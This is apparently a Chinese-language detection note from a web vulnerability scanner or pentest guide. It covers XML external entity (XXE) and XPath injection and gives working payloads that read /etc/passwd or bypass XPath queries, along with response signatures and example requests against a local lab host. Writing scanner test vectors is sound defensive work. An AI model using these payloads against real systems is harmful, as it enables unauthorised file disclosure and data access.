1) 检测方法
通过爬取的url,获取参数(get/post/cookie),并修改参数为
<%3Fxml version%3D"1.0"encoding%3D"UTF-8"%3F><!DOCTYPE UserInfo[<!ENTITY nameSYSTEM"file%3A%2f%2f%2fetc%2fpasswd">]><aa>%26name%3B<%2faa>
匹配对应返回特征
2) 测试向量
测试向量 |
返回特征 |
<%3Fxml version%3D"1.0" encoding%3D"UTF-8"%3F><!DOCTYPE UserInfo[<!ENTITY name SYSTEM "file%3A%2f%2f%2fetc%2fpasswd">]><aa>%26name%3B<%2faa>
|
/bin/bash |
'or 1=1]/parent::*/child::node()%00 |
对比初始页面和返回页面,返回页面内容包含初始页面内容 |
“or 1=1]/parent::*/child::node()%00 |
对比初始页面和返回页面,返回页面内容包含初始页面内容 |
3) 示例
1.访问链接:http://192.168.7.121/xml/example1.php?xml=%3Ctest%3Ehacker%3C/test%3E
修改参数值hacker为
<%3Fxml version%3D"1.0"encoding%3D"UTF-8"%3F><!DOCTYPE UserInfo[<!ENTITY nameSYSTEM"file%3A%2f%2f%2fetc%2fpasswd">]><aa>%26name%3B<%2faa>
得到链接:
访问结果
2.访问链接:http://192.168.7.121/xml/example2.php?name=hacker
修改参数值hacker为
'or1=1]/parent::*/child::node()%00
得到链接:
http://192.168.7.121/xml/example2.php?name=%27or%201=1]/parent::*/child::node()%00
访问结果